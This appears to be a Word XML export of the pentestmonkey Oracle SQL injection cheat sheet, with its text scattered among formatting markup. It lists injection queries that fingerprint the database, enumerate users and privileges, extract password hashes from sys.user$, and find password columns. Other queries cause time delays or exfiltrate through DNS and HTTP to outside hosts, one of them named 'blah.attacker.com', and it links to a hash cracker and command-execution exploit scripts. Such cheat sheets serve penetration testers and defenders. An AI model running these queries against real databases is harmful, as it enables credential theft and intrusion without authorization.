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Oracle SQL Injection Cheat Sheet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shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>ome useful syntax reminders for SQL Injection into Oracle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shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>This post is part of a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Pr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>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Some of the queries in the table below can only be run by an admin.  These are marked with “– priv” at the end of the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tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1272" w:tblpY="308"/>
        <w:tblOverlap w:val="neve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29"/>
        <w:gridCol w:w="8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Version</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banner FROM v$version WHERE banner LIKE ‘Oracle%’;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banner FROM v$version WHERE banner LIKE ‘TNS%’;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version FROM v$instance;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Comments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1 FROM dual — comment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NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a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User</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 FROM dual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Users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username FROM all_users ORDER BY username;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FROM sys.user$;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Password Hashes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password, astatus FROM sys.user$ — priv, &lt;= 10g.  astatus tells you if acct is locked</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name,spare4 FROM sys.user$ — priv, 11g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Password Cracker</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"http://www.red-database-security.com/software/checkpwd.html"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checkpwd</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will crack the DES-based hashes from Oracle 8, 9 and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Privileges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 FROM session_privs; — current privs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 FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs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grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular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GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;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DBA Accounts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DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles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Database</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global_name FROM global_name;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FROM v$database;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instance_name FROM v$instance;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SYS.DATABASE_NAME FROM DUAL;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Databases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DISTINCT owner FROM all_tables; — list schemas (one per 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Also query TNS listener for other databases.  See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"http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html"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tnscmd</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(services |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Columns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column_name FROM all_tab_columns WHERE table_name = ‘blah’;</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column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;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Tables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table_name FROM all_tables;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owner, table_name FROM all_tables;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Find Tables From Column Name</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owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper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Row</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username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from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Char</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substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character,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Bitwise AND</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bitand(6,2) FROM dual; — returns 2</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bitand(6,1) FROM dual; — returns0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ASCII Value -&gt; Char</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chr(65) FROM dual;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Char -&gt; ASCII Value</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ascii(‘A’) FROM dual; — returns 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Casting</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CAST(1 AS char) FROM dual;</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CAST(’1′ AS int) FROM dual;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String Concatenation</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 || ‘B’ FROM dual;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Statement</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BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements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Case Statement</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CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1</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CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns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Avoiding Quotes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chr(65) || chr(66) FROM dual;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Time Delay</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BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT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UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow</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UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow</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UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow</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Also see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"http://technet.microsoft.com/en-us/library/cc512676.aspx"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Heavy Queries</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to create a time delay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DNS Requests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UTL_INADDR.get_host_address(‘google.com’) FROM dual;</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UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;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Command Execution</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"http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql"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Java</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can be used to execute commands if it’s installed.</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"http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql"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ExtProc</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can sometimes be used too, though it normally failed for me. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:instrText xml:space="preserve">INCLUDEPICTURE \d "http://pentestmonkey.net/wp-includes/images/smilies/icon_sad.gif" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="142875" cy="1428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hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4C5356"/>
                <w:spacing w:val="0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>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Local File Access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"http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql"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UTL_FILE</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can sometimes be used.  Check that the following is non-null:</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value FROM v$parameter2 WHERE name = ‘utl_file_dir’;</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"http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql"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Java</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can be used to read and write files if it’s installed (it is not available in Oracle Express).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Hostname, IP Address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UTL_INADDR.get_host_name FROM dual;</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host_name FROM v$instance;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UTL_INADDR.get_host_address FROM dual; — gets IP address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UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames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Location of DB files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FROM V$DATAFILE;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Default/System Databases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8555"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SYSTEM</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SYSAUX</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b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31373A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="31373A"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Misc Tips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In no particular order, here are some suggestions from pentestmonkey readers.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From Christian Mehlmauer:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1249" w:tblpY="313"/>
        <w:tblOverlap w:val="neve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53"/>
        <w:gridCol w:w="8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5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Get all tablenames in one string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823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rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables –  when using union based SQLI with only one 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5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Blind SQLI in order by clause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823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order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end — you must know 2 column names with the same datatype</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>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894115"/>
    <w:rsid w:val="2A9C3F41"/>
    <w:rsid w:val="303A453B"/>
    <w:rsid w:val="3B403E46"/>
    <w:rsid w:val="3DF64FEE"/>
    <w:rsid w:val="71CA42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2017-01-20T02:13:28Z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